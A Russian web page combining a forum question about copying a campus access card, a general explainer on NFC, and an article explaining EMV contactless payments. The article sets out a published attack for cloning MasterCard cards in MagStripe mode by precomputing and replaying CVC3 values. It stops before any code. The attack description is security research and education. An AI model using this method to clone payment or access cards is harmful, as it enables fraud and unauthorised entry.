Как считать данные карты nfc
Перейти к содержимому

Как считать данные карты nfc

  • автор:

Как считать данные с банковской nfc карты?

Проблема такая: есть кампусная карта, она же пропуск. Проблема в том, что её могут считать только считыватели на турникете. Купил модуль rfid rc 522. Хочется считать с неё данные и записать их в брелок, а лучше если в эмулятор карт на телефоне с nfc. Хз какие какие данные считываются, по этому нужно хотя бы uid.

Отслеживать

задан 16 апр 2018 в 11:57

11 1 1 бронзовый знак

Пожалуйста, добавьте код, который у вас уже есть.

16 апр 2018 в 11:59

RFID может использовать разные частоты, я не уверен, что NFC на телефоне сможет сэмулировать пропускную карту.

16 апр 2018 в 12:25

Код брал из примеров библиотеки для ардуино rfid rc 522

Что такое NFC в смартфоне и не только

Фото: Shutterstock

Near Field Communication (NFC) — это технология беспроводной передачи данных малого радиуса действия. С помощью нее можно обмениваться данными между устройствами, находящимися на расстоянии около 10 см. NFC представляет собой радиочастотный обмен данными на частоте 13,56 МГц, таким образом, для ее работы не требуется интернет. В отличие от Bluetooth, NFC не требует ручного сопряжения или обнаружения устройств для передачи данных. Соединение автоматически запускается, когда другое устройство NFC входит в ранее указанный диапазон.

NFC поддерживает три режима работы: чтения и записи, одноранговой связи и эмуляции карты. При первом устройства работают как смарт-карты, например, при выполнении платежа. При втором (Peer-to-peer) режиме два устройства с поддержкой NFC взаимодействуют друг с другом для обмена информацией и файлами. Например, в одноранговом режиме пользователи могут обмениваться параметрами настройки соединения Bluetooth, Wi-Fi или фотографиями. При третьем режиме устройства считывают информацию в NFC-тегах или метках, встроенных в интеллектуальные плакаты и дисплеи, либо записывают информацию на них. Этот режим позволяет читать расписания транспорта, туристические метки и маршруты.

Схема работы NFC

Схема работы NFC (Фото: AndroidCure)

Устройства NFC состоят из считывателя (ридера) и антенны, либо из метки и антенны. Ридер генерирует радиочастотное поле, которое может взаимодействовать с меткой или с другим ридером, он работает в режиме активной коммуникации. Этот тип коммуникации используется при одноранговом режиме. Метка — это устройство NFC, которое работает в режиме пассивной коммуникации. Это означает, что устройство с меткой использует поле, которое сгенерировало устройство-инициатор. Такой вид коммуникации используется во всех режимах работы NFC.

Для чего используют NFC

Технологию применяют не только для бесконтактной оплаты и считывания меток. NFC также используется в устройствах «умного» дома, автомобилях и даже в качестве ключей.

Для платежей

Чипы NFC используются в пластиковых картах для возможности бесконтактной оплаты, а также в кольцах или браслетах со встроенным чипом. Обычно в чип встраивается платежное приложение банка, которое через платежную систему взаимодействует с продавцом при транзакции, а также персональные платежные данные клиента. Они хранятся в зашифрованном виде. NFC-модуль в карте обеспечивает бесконтактное соединение со считывателем.

При эмуляции карты на смартфоне данные хранятся в TSM (Trusted Service Manager), который объединяет поставщиков услуг и чипы Secure Element. Это аппаратно-программный комплекс, который обеспечивает защищенную загрузку и управление безопасностью с использованием технологий беспроводной сотовой связи (over-the-air, OTA). TSM позволяет устанавливать и настраивать приложения в элементе безопасности мобильного телефона, а затем — обслуживать их.

В 2021 году Mastercard и восемь российских банков запустили в продажу брелоки для бесконтактной оплаты.

Для идентификации

NFC используют для контроля доступа или удостоверения личности. Технология позволяет помимо обычного контроля доступа также оплачивать услуги и проживание, создавать пропуска, проверять личность или предоставлять прочие разрешения. Самым простым примером использования NFC являются домофоны, где в брелок зашивается метка с ключом, а в устройстве на двери стоит считыватель меток.

NFC-замок

NFC-замок (Фото: The New York Times)

Также NFC применяют гостиницы, чтобы контролировать потоки клиентов и их доступ в зависимости от привилегий. Гостям таких мест не нужен физический ключ, так как они могут войти в номер или посетить другие зоны, имея только смартфон. Их учетные данные генерируются в режиме реального времени, а все операции обрабатываются прямо на смартфоне, чтобы избежать утечек или хищения информации.

Для торговли

Компании предлагают пользователям хранить свои бонусные и подарочные, а также карты лояльности в приложениях «электронных кошельков», чтобы не носить их с собой. В Google Pay карты лояльности интегрированы прямо в платежное приложение, что позволяет бесконтактно оплачивать покупки при помощи NFC. Некоторые магазины также позволяют привязывать купоны внутри собственных приложений. При этом данные карт хранятся в защищенном элементе (Security Element или SE) смартфона, что защищает их от стирания.

Для транспорта

Бесконтактные транспортные карты на базе NFC используются на транспорте, а также на горнолыжных курортах в системах подъемников и на фуникулерах. Пополнить карту обычно можно в киоске по продаже транспортных билетов или онлайн. Ее также можно интегрировать в Apple Pay и Google Pay. В августе 2021 года в Москве начали тестировать оплату виртуальной картой «Тройка» в Samsung Pay.

Для защиты автомобиля

Приложение на устройстве с поддержкой NFC позволяет использовать смартфон как ключ автомобиля. Его достаточно поднести к ручке двери водителя, чтобы заблокировать и разблокировать двери машины. В салоне смартфон размещается на специальном месте на приборной панели, которое является также площадкой беспроводной зарядки, что позволяет включить зажигание.

NFC-ключ для авто

NFC-ключ для авто (Фото: AppleInsider)

В 2020 году организация Car Connectivity Consortium, которая объединяет производителей автомобилей и мобильных устройств, выпустила спецификацию Digital Key Release 2.0. Она включает в себя поддержку функций блокировки и разблокировки автомобиля, запуска двигателя, аутентификации пользователя, отзыва цифрового ключа у другого пользователя, цифрового обмена ключами и ограничения использования ключа. Последний хранится в SE смартфона. Датчики NFC в автомобиле устанавливают в ручке двери водителя и на передней панели.

Свой NFC-ключ для автомобиля представила Apple. Car Key можно привязать к приложению Wallet, он позволяет разблокировать и заводить автомобиль с помощью iPhone или Apple Watch, а также им можно поделиться с другими людьми.

Для медицины

NFC может обеспечивать безопасный доступ к медицинской информации. Технологию применяют для управления доступом к компьютерам, планшетам и другим устройствам.

Медицинские браслеты с NFC позволяют отслеживать передвижения пациентов. Персонал может в реальном времени узнать, где находится пациент, когда в последний раз его посещала медсестра или какое лечение назначил его врач. Браслеты можно подключать к смартфонам или планшетам, чтобы они передавали данные лечащему врачу. Интеллектуальные браслеты с NFC также помогают отслеживать пациентов с опасными для жизни состояниями, такими как диабет, астма или аллергия. При возникновении экстренной ситуации браслет предоставит подробную информацию врачам скорой помощи. Подобные устройства выпускает HealthID Profile.

Наконец, метки NFC добавляют на упаковку или в маркировку лекарства, чтобы подтвердить его подлинность, просмотреть подробную информацию о дозировках или прочитать о побочных эффектах. Метка также может содержать веб-ссылку на сайт производителя.

Для игр

В игровой индустрии технологию используют в виде меток, на которые записаны данные, импортирующиеся в игровое приложение в виде героя или игрового поля. Компания Activision выпустила игру Skylanders: Spyros Adventure, где герои были связаны с реальными физическими статуэтками, которые оснащены NFC-меткой. Фигурку надо купить и разместить на специальном портале, чтобы герой появился в игре. Nintendo также реализовала эту стратегию в игре Amiibo.

Для интернета вещей (IoT)

В системах интернета вещей используются приборы и датчики, интерфейсы и механизмы подключения которых различаются. Интеграция интерфейса NFC в шлюз IoT или микрокомпьютер, который работает как агрегатор всех устройств, позволяет беспрепятственно подключать их. При этом смартфон с поддержкой NFC после регистрации в шлюзе можно использовать для передачи команд устройствам и смены их настроек. Причем, технология позволяет управлять даже устройствами без интерфейса — лампочками, датчиками безопасности или розетками.

NFC может также выступать в виде меток. Они работают без питания и достаточно маленькие, чтобы поместиться внутри плаката, билета, визитной карточки, наклейки, браслета, брелки, ручки, бирки и иного предмета.

Поиск NFC-меток на iPhone

Поиск NFC-меток на iPhone (Фото: Allthings.now)

Микрочип в метке может хранить небольшие фрагменты данных, которые могут быть считаны устройством с поддержкой NFC. В метке NFC можно хранить URL-адрес, контактную информацию или даже команды и настройки, которые устройство будет выполнять при контакте. Для чтения или записи данных в метки NFC потребуется специальное приложение, например, Trigger.

NFC на телефоне и не только

NFC World ведет список смартфонов с поддержкой технологии. В соответствии с ним, каждый iPhone, начиная с iPhone 6, поддерживает ее. Последние iPhone 12 также поддерживают теги NFC через приложение Launch Center Pro.

NFC добавили и в линейку iPad, начиная с iPad Pro, iPad Air 2 и iPad Mini третьего поколения.

С поддержкой NFC выпускается каждое устройство под управлением Android 4.0 или более новой версии ОС. Samsung, к примеру, отдельно публикует список своих смартфонов с поддержкой NFC и характеристиками технологии.

Функцию NFC встраивают и в «умные» браслеты, к примеру, серии Xiaomi Mi Band. А »умные» часы с NFC работают так же, как смартфон с аналогичным чипом. Обычно их функционал ограничен и используется только для оплаты покупок и услуг.

Кроме того, существуют NFC-кольца для оплаты покупок.

«Умное» кольцо с NFC

«Умное» кольцо с NFC (Фото: Smart Ring News)

Кольцами можно пользоваться для оплаты общественного транспорта, а также как ID-карточкой. Чтобы воспользоваться кольцом, нужно установить на смартфон приложение от его разработчика.

Как узнать, есть ли NFC в телефоне

В случае с Android-смартфонами нужно перейти в настройки и в строке «Поиск» ввести «NFC», а затем подключить опцию. В быстрых настройках иконка в виде буквы N обычно находится рядом со иконками Wi-Fi и Bluetooth. Кроме того, некоторые компании размещают символику NFC на батарейке смартфона. Наконец, можно установить одно из бесплатных приложений NFC Enabled из магазина приложений Google Play. Оно сканирует устройство, и, если в смартфон интегрирован чип, то на экране появляется сообщение «NFC is: supported». Если чип не предусмотрен, программа выдает сообщение «NFC is: unsupported».

На iOS-устройствах ничего настраивать не нужно — достаточно поднести телефон к другому устройству. Однако потребуется настроить оплату различных сервисов с помощью Apple ID в, где выполнен вход в iCloud. Модели iPhone 6 и 7 поддерживают платежи с помощью NFC с восьми банковских карт, а более новые могут производить расчеты уже с 12 счетов, активированных на одном устройстве.

Как пользоваться NFC на Android

Самой популярной функцией NFC все же являются бесконтактные платежи. На смартфонах под управлением Android для оплаты товаров и услуг можно использовать Google Pay или Samsung Pay.

Google Pay

Google Pay, ранее известный как Android Pay, позволяет совершать покупки и переводить деньги. Также в приложении можно использовать карты постоянного клиента, подарочные карты и проездные. Для работы с ним потребуется учетная запись Google.

Google Pay

Google Pay (Фото: 9to5google)

Сначала нужно настроить Google Pay. После его скачивания из Google Play нужно выбрать страну проживания, учетную запись Google и ввести номер телефона. Затем нужно ввести код из сообщения для аутентификации. Добавление дебетовой или кредитной карты осуществляется во вкладке Insights в правом нижнем углу экрана.

Чтобы добавить карту постоянного клиента, подарочную или транспортную карту, нужно нажать на значок кредитной карты в правом верхнем углу главного экрана приложения.

К Google Pay можно привязать банковский счет для пополнения баланса. Для этого нужно зайти во вкладку Insights, выбрать «баланс Google Pay» и «добавить деньги», затем ввести нужную сумму и нажать на «добавить банковский счет».

Для оплаты покупок нужно убедиться в том, что NFC включен, а затем поднести заднюю часть устройства к платежному терминалу на несколько секунд. Когда платеж будет завершен, на экране появится синяя галочка.

Samsung Pay

Samsung Pay, в отличие от Apple Pay и Google Pay, помимо технологии NFC, использует функцию MST или защищенной магнитной передачи и работает практически везде — даже на старых терминалах, которые не были обновлены для работы с бесконтактными платежами. Однако в 2021 году поддержку этой функции начали постепенно сворачивать, начиная с телефонов Galaxy S21. Samsung Pay доступен в 29 странах мира, в том числе и в России. Он также доступен на «умных» часах линеек Galaxy Watch, Galaxy Watch Active, Gear и Gear Sport.

Samsung Pay

Samsung Pay (Фото: Samsung)

Для настройки сервиса нужно запустить приложение, войти в свою учетную запись Samsung и зарегистрировать PIN-код или отсканировать отпечаток пальца. В Samsung Pay можно добавлять кредитные и дебетовые карты платежных систем Mastercard, Visa и МИР, а также совершать денежные переводы. Кроме этого в сервис можно загрузить до 100 карт лояльности.

Samsung Pay

Samsung Pay (Фото: Samsung)

При оплате нужно выбрать карту на главном экране приложения, а затем приложить палец к сканеру отпечатков или ввести PIN-код. После этого можно приложить заднюю часть телефона к платежному терминалу. Всплывающее уведомление о транзакции появится в верхней части экрана.

Как пользоваться NFC на iPhone

Функция NFC в iPhone, как уже было упомянуто, включается и отключается теми приложениями, которым она требуется. Чтобы привязать карту к Apple Pay, нужно зайти в приложение Wallet, нажать на «+» и следовать инструкциям. С 2021 года российские пользователи могут привязывать, помимо Visa и Mastercard, также карты «Мир».

Для оплаты нужно приложить палец к Touch ID или пройти идентификацию в Face ID и поднести верхнюю часть iPhone к бесконтактному считывателю. Смартфон сам активирует NFC.

Apple Pay

Apple Pay (Фото: Akket)

Если первые iPhone 6 с NFC позволяли только совершать платежи через Apple Pay, то iPhone 7 и более новые модели используют технологию для чтения меток NFC с помощью сторонних приложений. Кроме того, начиная с iOS 13 и выпуска iPhone XS и XR, они также могут кодировать пустые метки с помощью сторонних приложений, таких как GoToTags. И, наконец, начиная с iPhone XS и заканчивая iPhone 12, смартфоны способны считывать метки в фоновом режиме. Таким образом, пользователю больше не нужно устанавливать сторонние приложения: достаточно приложить iPhone к метке NFC, и он автоматически считает ее. Система автоматически ищет метки поблизости при каждом включении экрана. После обнаружения и сопоставления метки она показывает уведомление о том, что пользователь может отправить данные в приложение для обработки. Однако фоновое чтение отключается, когда используются Wallet или Apple Pay, камеры, устройство находится в режиме полета, либо заблокировано после перезапуска.

Чтобы активировать другие функции NFC в iPhone, потребуется запустить приложение «Команды», открыть вкладку «Автоматизации», нажать на «+» в верхнем правом углу, найти NFC и выбрать пункт «Тег NFC». Затем необходимо включить Bluetooth-наушники или другое беспроводное устройство, подключить их к iPhone, поднести устройство с меткой к задней панели смартфона и подождать пару секунд. После подключения требуется открыть меню «Скрипты», выбрать пункт «Задать место воспроизведения» и указать свой iPhone; затем выбрать из списка подключаемое устройство и снять галочку в пункте «Спрашивать при выполнении». Процедуру придется повторить с каждым устройством.

Фото:PhotoMIX Company / Pixabay

Насколько безопасна технология NFC?

В начале 2000-х годов NFC-модули считались неуязвимыми для атак хакеров. Однако позднее программисты описали ряд теоретических атак, которые могут использоваться для кражи информации и заражения смартфона вирусом. В 2012 году была выявлена первая критическая уязвимость NFC. Тогда компания MWR Labs продемонстрировала процесс передачи вируса, заражения устройства и получения полного контроля над смартфоном всего за пять минут. Для этого было достаточно поднести устройство к метке, содержащей вредоносный код.

На сегодняшний день сигналы NFC шифруются с помощью криптографических алгоритмов, а параллельно ведется разработка новых протоколов шифрования. Кроме того, в мобильных приложениях банков платежи обычно нужно дополнительно подтвердить PIN-кодом, отпечатком пальца или снимком радужной оболочки глаза.

Тем не менее, специалисты рекомендуют соблюдать следующие правила:

  • Проводить бесконтактные оплаты в проверенных местах: на заправках, в супермаркетах, кафе и торговых центрах.
  • Не подносить смартфон к NFC-меткам, расположенным в общественных местах, в том числе к рекламным объявлениям.
  • При использовании терминала самообслуживания с поддержкой NFC проверять, нет ли там наклейки или других посторонних объектов.
  • Не давать смартфон другим людям и не класть его рядом с другими устройствами в общественных местах.
  • Сканировать смартфон на наличие вирусов и обновлять платежные приложения.
  • Выключать функцию NFC, когда она не нужна.

Клонируем бесконтактную карту с помощью мобильного приложения

Всегда было интересно посмотреть, что происходит у банковской карточки под «капотом». Как реализуется протокол общения банковской карточки и POS-терминала, как это работает и насколько это безопасно. Такая возможность предстала передо мной, когда я проходил стажировку в компании Digital Security. В результате при разборе одной известной уязвимости EMV карт в MagStripe-режиме, было решено реализовать мобильное приложение, которые способно общаться с терминалом по бесконтактному интерфейсу, с использованием своих команд и подробным разбором запросов и ответов. А также попробовать реализовать способ клонирования карт MasterCard в режиме MagStripe.

В этой статье я постараюсь описать, что такое EMV-карта, как она работает и как используя Android можно попытаться клонировать вашу MasterCard карту.

«There are some things money can’t buy. For everything else, there’s MasterCard»

Что такое EMV карта?

EMV — это международный стандарт для банковских карт с чипом. В разработке этого стандарта принимали участия Europay + MasterCard + VISA, отсюда и название. Попробуем разобраться, как же все таки карта общается с POS-терминалом по бесконтактному интерфейсу.

Начнем с самых основ.

Бесконтактная EMV карта на физическом уровне работает почти так же, как и RFID метка. Если базисно то, чип попадает в электромагнитное поле, а в замкнутом проводящем контуре (в нашем случае это будет антенна, расположенная по периметру), помещенном в переменное магнитное поле, образуется переменный электрический ток. Этот ток заряжает специальный конденсатор, подключенный параллельно к резонансному контуру карты. Энергия, запасенная в конденсаторе, используется для выполнения микросхемой карты различных операций. Когда ридер изменяет электромагнитное поле, изменения сразу будут заметны на чипе. Используя модуляцию сигнала, мы можем передавать информацию в бинарном виде. Если на карте подключить нагрузочное сопротивление и или изменить емкость конденсатора, то можно изменить силу тока в контуре карты, что приведет к изменению создаваемого им электромагнитного поля в области контура ридера, таким образом карточка передает данные. Ридеру останется детектировать эти изменения. Подобное физическое взаимодействие регламентируется стандартом ISO/IEC 14443 “Identification Cards — Contactless integrated circuit(s) cards — Proximity cards”.

Сам чип карты представляет собой смарт карту, на которой работает JavaCard, отдельная версия Java для платформ с малыми вычислительными ресурсами и поддержкой криптографических алгоритмов. На JavaCard загружаются апплеты, которые, и являются приложениями. Также существует GlobalPlatform это некий стандарт для JavaCard, который предоставляет возможность безопасного управления данными на карте и позволяет загружать, изменять и удалять приложения на карте. В этой статье механизмы безопасности самой смарт карты мы рассматривать не будем. Достаточно знать, что защищенные данные, например приватный ключ и секретный мастер ключ карты лежат в защищенном месте и вытащить их стандартными средствами невозможно.

Также еще напомню немного терминологии, для тех, кто не знаком.

POS-терминал (Point of Sale) — устройство продавца, которое считывает карту и инициирует платеж. Далее будем называть это устройство просто терминалом.
Банк эмитент — это банк, который выпустил вашу карту.
Банк эквайер — банк, который выдает продавцам POS-терминалы и обрабатывает платежи с них.
Платежная система — центральное звено между банком эквайером и банком эмитентом, через нее проходят абсолютно все платежи, и она знает какой банк какому сколько должен перевести денег. Платежных систем в мире не мало, кроме всем известных Visa и MasterCard есть ещё и American Express, China UnionPay и российская платежная система МИР.

Хорошо, карта и ридер могут общаться. Они посылают друг другу APDU-команды в виде Tag-Length-Value т.е. передается название тэга в шестнадцатеричном виде, его длина и само значение. Все команды описаны конечно же в документации и выглядят примерно так:

image

Стандартная EMV транзакция проходит в несколько этапов, я опишу полный алгоритм взаимодействия в случае контактного интерфейса, для бесконтактного интерфейса алгоритм несколько укорочен:

image

  • Выбор приложения;
  • Инициализация обработки приложения;
  • Считывание данных приложения;
  • Офлайн аутентификация;
  • Обработка ограничений;
  • Проверка держателя карты;
  • Риск-менеджмент на стороне терминала;
  • Анализ действий терминала;
  • Риск-менеджмент на стороне карты;
  • Анализ действий карты;
  • Процессинг в режиме on-line;
  • Завершение операции.

Коротко рассмотрим каждую операцию.

Выбор приложения. Часто бывает, что на одной карте может быть несколько приложений. Например, банковская карта и проездной билет. И терминалу как-то необходимо разобраться, где и какой алгоритм ему использовать. Для выбора приложения используются так называемые Идентификационные Коды приложения (Application Identifier – AID). Что бы в этом разобраться терминал посылает команду SELECT. Например, AID карты Visa Classic будет выглядеть следующим образом: A0000000031010. Если в ответ придет несколько таких кодов и терминал умеет работать с несколькими приложениями, то терминал выведет на экран список и предложит выбрать нужное нам приложение. Если терминал не поддерживает ни один из кодов приложений, то операция будет отклонена терминалом.

Инициализация обработки приложения. Здесь сначала проверяется географическое место пребывания. Например, карты Maestro Momentum могут работать для оплаты только в России. Этот этап сделан для того, чтобы предоставить эмитентам возможность применять существующие онлайн методы риск-менеджмента при проведении офлайн операций. На этом этапе EMV-транзакция может быть отменена по инициативе самой карты, если данный тип операции запрещен в данной стране мира эмитентом. Далее карта передает терминалу набор специально структурированной информации, содержащей описание функциональности карты и приложения.

Считывание данных приложения. Терминалу передаются различные данные карты необходимые для транзакции, например номер карты, expiration date, счетчик транзакций и много других данных. О некоторых из них будет сказано далее.

image

Также передается сертификат публичного ключа банка эмитента и самой карты. Для того чтобы терминал был способен проверить цифровую подпись некоторых данных карты используется PKI-инфраструктура (Public Key Infrastructure). Вкратце, у платежной системы есть пара ключей — публичный и приватный и платежная система является для всех участников CA (Center Authority). По сути платежная система для каждого банка эмитента выпускает новую пару ключей, и при этом формирует сертификат публичного ключа банка эмитента, подписывая его приватным ключом CA. Далее, когда банк выпускает новую карту, он соответственно генерирует для карточки пару ключей, и также формирует сертификат публичного ключа карты, подписывая его с помощью приватного ключа банка. В терминалах обычно зашит сертификат публичного ключа для различных платежных систем. Таким образом, когда карточка передает сертификат публичного ключа банка эмитента и сертификат самой карты, терминал может с легкостью проверить всю цепочку, используя публичный ключ платежной системы. Терминал с помощью публичного ключа платежной системы сначала проверяет подлинность сертификата банка эмитента, если он подлинный, то значит ему можно доверять и теперь с помощью сертификата банка эмитента можно проверить сертификат самой карты. Более подробней в статье про безопасность EMV .

Офлайн аутентификация. Терминал определяет тип поддерживаемого метода оффлайн аутентификации. Существует статичная (Static Data Authentication – SDA), динамическая (Dynamic Data Authentication – DDA) и комбинированная (Combined Data Authentication – CDA). Эти методы также построены на основе PKI. SDA это просто подписанные данные на приватном ключе банка эмитента, DDA — терминал посылает какое-то случайное число и карточка должна подписать его, используя свой приватный ключ, а терминал проверит эту подпись используя полученный ранее сертификат карты, таким образом терминал удостовериться в том, что карточка и правда обладает приватным ключом — следовательно является подлинной. CDA это просто комбинация обоих способов.

Обработка ограничений. Здесь терминал проверяет полученные ранее данные с карты на условие пригодности для данной операции. Например, проверяет срок начала/окончания действия приложения Application Expiration Date (Tag ‘5F24’) и Application Effective Date (Tag ‘5F25’). Также производится проверка версии приложения. Результаты операций, проводимых на данном этапе, также записываются в отчет TVR (Terminal verification results). По результатам этого этапа транзакция не может быть отменена, даже в случае, если, например, срок действия приложения истек.

Проверка держателя карты. Верификация держателя карты производится для того, чтобы аутентифицировать человека, предоставившего карту и проверить, является ли он подлинным владельцем карты. Стандарт EMV предоставляет различные методы верификации держателя карты (Cardholder Verification Method). Методы верификации определены как на терминале, так и на карте. Они содержатся в так называемых CVM-листах. В процессе выполнения, терминал и карточка сравнивают полученные CVM-листы и выбирают общий метод верификации.

Список поддерживаемых методов верификации:

  • No CVM required (‘011111’b);
  • Fail CVM processing (‘000000’b);
  • Signature (‘011110’b);
  • Enciphered PIN verified online (‘000010’b);
  • Plaintext PIN verification performed by ICC (‘000001’b);
  • Plaintext PIN verification performed by ICC and signature (‘000011’b);
  • Enciphered PIN verification performed by ICC (‘000100’b);
  • Enciphered PIN verifi cation performed by ICC and signature (‘000101’b).

Риск-менеджмент на стороне терминала. На этом этапе терминал проводит внутреннюю проверку параметров транзакции, исходя из установок риск-менеджмента банка-эквайера. Процедуры риск-менеджмента могут быть выполнены терминалом в любое время между моментами завершения процесса чтения данных карты и формирования терминалом первой команды GENERATE AC. Риск-менеджмент на стороне терминала включает в себя три механизма:

  • контроль размера операций, выполненных по карте (Floor Limit Checking);
  • случайный выбор транзакции для онлайн авторизации этой транзакции эмитентом (Random Transaction Selection);
  • проверка офлайн активности использования карты (Velocity Checking).

Риск-менеджмент на стороне карты. Карта, получив из команды GENERATE AC данные, касающиеся транзакции, терминала и результатов проверок терминала, в свою очередь выполняет собственные процедуры управления рисками и выносит собственное решение о способе завершения операции.

Анализ действий карты. На этом этапе карта завершает проведение процедур риск-менеджмента и формирует ответную криптограмму терминалу. Если карта решает одобрить транзакцию, то формируется Transaction Certificate. Если карта принимает решение о выполнение операции в режиме реального времени, то она формирует ARQC (Authorization Request Cryptogram). Если карта использует альтернативные методы авторизации, тогда используется Application Authorization Referral. В случае, если карта отклоняет транзакцию, то Application Authentication Cryptogram.

Еще одна криптограмма ARPC (Authorization Response Cryptogram) нужна для аутентификации эмитента. Эмитент формирует криптограмму ARPC и отсылает криптограмму карте, если карта подтвердит пришедшую криптограмму, то следовательно, эмитент аутентифицирован картой.

Немного о безопасности ключей и взаимной аутентификации карты и эмитента из книги И. М. Голдовского:

Смысл взаимной аутентификации заключается в том, что карта и терминал аутентифицируют друг друга с помощью проверки подлинности криптограмм ARQC и ARPC. Криптограммы представляют собой данные, формируемые с использованием секретного ключа (который известен карте и банку эмитенту), номера транзакции, случайного числа, сгенерированного терминалом, а также некоторых реквизитов транзакции, терминала и карты. В случае ARPC к перечисленным данным еще добавляется авторизационный код ответа эмитента. Без знания секретного ключа карты для генерации криптограммы вычислить значения ARQC/ARPC невозможно за обозримое время с текущим уровнем технологий, и потому факт их успешной верификации указывает на подлинность карты и эмитента. Онлайн аутентификация является наиболее надежным способом аутентификации карты. Это связано с тем, что она выполняется непосредственно эмитентом, без посредника в виде терминала. Кроме того, для онлайновой аутентификации используется алгоритм 3DES с временным ключом размером 112 битов, криптостойкость которого соответствует криптостойкости алгоритма RSA с длиной модуля асимметричного ключа, используемого для офлайн аутентификации приложения карты, более 1700 бит. Использование на карте асимметричных ключей такой длины все еще достаточная редкость. Обычно используются ключи с модулем длиной 1024, 1152 или 1408 бит.

В конечном итоге онлайн транзакция проходит по цепочке:
Карта POS-Терминал Банк Эквайер Платежная Система Банк Эмитент.

image

Клонируем карту MasterCard в режиме MagStripe

Перейдем непосредственно к принципу клонирования. Данный метод атаки на бесконтактные карты был опубликован двумя исследователями Michael Roland, Josef Langer из Австрийского университета. В его основе лежит общий принцип, который называется Skimming. Это такой сценарий, при котором злоумышленник крадет деньги с банковской карточки путем считывания (копирования) информации с этой карты. В общем случае здесь важно сохранять PIN-код в тайне и не допускать его утечки. Но в методе австрийских ребят это нам знать не нужно. Клонирование платежной карты выполняется успешно для версии ядра приложения EMV Contactless Kernel 2. Версия этого протокола поддерживает два режима работы для бесконтактных карт: EMV протокол (MasterCard PayPass M/Chip) и MagStripe (MasterCard PayPass MagStripe) режим.

MagStripe — это режим поддержки карт с магнитной полосой. Этот режим реализуется на картах MasterCard с бесконтактным интерфейсом. Режим MagStripe скорее нужен для банков которым сложно переводить всю инфраструктуру для поддержки чиповых бесконтактных EMV транзакций. Кстати, у карт Visa также есть аналогичный режим работы — PayWave MSD (Magnetic Stripe Data).

Процесс обработки транзакции для бесконтактных карт урезан в сравнении с чиповыми и обычно работает в следующем режиме:

image

  1. Терминал отправляет команду SELECT PPSE (Proximity Payment System Environment). Карта шлет список поддерживаемых приложений.
  2. Терминал отправляет команду SELECT. В ответ получает необходимые детали приложения.
  3. Терминал отправляет команду GET_PROCESSING_OPTIONS. Карта отвечает какой тип аутентификации она поддерживает и существует ли там верификация держателя карты.
  4. Терминал отправляет команду READ_RECORDS. Карта в ответе посылает Track1 и Track2 практически аналогичный тому, что записан на магнитной полосе карты.
  5. Терминал отправляет команду COMPUTE_CRYPTOGRAPHIC_CHECKSUM. Которая означает, что карта должна на основе переданного Unpredictable Number сгенерировать значение CVC3.

Как это все выглядит в реальной жизни?

Это выглядит как APDU команды. Список всех тэгов.

APDU — Application Protocol Data Unit — это условное обозначение кадра с командой карте или ответом карты.

На хабре есть пара статей на эту тему тут и тут.

Карта поддерживает специальную команду COMPUTE CRYPTOGRAPHIC CHECKSUM, аргументом которой являются данные, определенные в объекте Unpredictable Number Data Object (UDOL). В результате карта с помощью алгоритма 3DES и секретного ключа вычисляет динамическую величину CVC3 (Card Verification Code). В качестве аргумента функции 3DES используется конкатенация данных UDOL и счетчика транзакции (Application Transaction Counter,ATC). Таким образом, значение величины CVC3 всегда зависит от объектов UN и ATC.

Другими словами, эта команда нужна, чтобы карта сгенерировала некую “подпись” для того, чтобы эмитент мог верифицировать карту. Однако, в этой подписи отсутствует подпись самой транзакции. В подписи содержатся значения ATC — 2 байта, CVC3 (Track1) — 2 байта, CVC3 (Track2) — 2 байта, которые генерируются картой на основе секретного ключа, который также знает банк-эмитент и счетчика транзакций (ATC). При этом также для генерации подписи POS-терминал сообщает карте UN (Unpredictable Number) — 4 байта, который также используется в генерации подписи. Unpredictable Number препятствует формированию кодов аутентификации на реальной карте для последующего использования в мошеннических транзакциях. Для атаки нам сильно мешает UN, поскольку 4 байта не представляется возможным перебрать, не выйдя за пределы счетчика транзакций. Однако, в спецификации этого есть некоторые слабости.

Во-первых, спецификация ограничивает UN кодировкой чисел, а именно Двоично-Десятичным Кодом (BCD), что по сути означает что, если мы посмотрим на такое закодированное число в HEX, то мы увидим только цифры от 0 до 9, все остальные значения считаются как бы запрещенными. Таким образом, количество UN уменьшается с 4,294,967,295 до 99,999,999.

Во-вторых, количество значащих цифр UN определяется картой. Таким образом в зависимости от специальных параметров в треках количество цифр в UN может быть от 10 до 10000 в зависимости от типа карты, на практике чаще всего встречается 1000 значений.

Таким образом план атаки выглядит следующий:

image

  1. Считываем карту и узнаем количество значащих цифр у UN, которое будет предоставлять терминал
  2. Перебираем все UN, получаем все возможные значения функции COMPUTE_CRYPTOGRAHIC_CHECKSUM, сохраняем их в соответствующей таблице с мапингом UN -> Result
  3. Подносим к POS-терминалу, узнаем число, которое просит POS-терминал.
  4. Выбираем из таблицы нужный результат и подставляем его в ответ терминалу.
  5. Транзакция уходит.
  6. PROFIT. Но успех одобрения транзакции не гарантирован, поскольку банк эмитент может отклонить такую транзакцию.

Стоит отметить также, что счетчик транзакций (ATC) препятствует повторному использованию ранее использованных кодов аутентификации, а значит что если мы использовали такую атаку, то необходимо копировать карту заново, поскольку счетчик транзакции уже использовался для получения информации и был использован в подписи, что значит, что если мы имели счетчик транзакций 1000, а после отправили транзакцию в банк, то банк уже не примет транзакции со счетчиком ниже

В большинстве случаев передаваемые данные с карты статические для всех транзакций. Конечно, кроме COMPUTE_CRYPTOGRAPHIC_CHECKSUM. Для генерации динамического CVC3 кода, приложение карты должно быть прочитано командой SELECT, затем GET_PROCESSING_OPTIONS, а только потом COMPUTE_CRYPTOGRACHIC_CHECKSUM и это довольно важный момент. Эти три команды обязательны для генерации CVC3. По данным эксперимента используя всего лишь эти три команды, перебор 1000 значений на Google Galaxy Nexus S занял всего одну минуту.

Для работы с терминалом и картой использовалась программа Terminal Simulator от MasterCard. Он прекрасно работает с различными NFC-считывателями и считывателями смарт карт. К тому же он абсолютно бесплатен. Он позволяет тестировать карты при различных настройках POS-терминала и ведет подробный лог всех запросов от терминала и ответов карты. Также его можно использовать для тестирования приложения на телефоне, работающего в режиме карты.

image

Для чтения карты использовался NFC считыватель ACR122.

image

Теперь давайте попробуем все это преобразовать в код. Приложение будем писать на языке Kotlin под Android. Сначала попытаемся описать общую структуру команды.

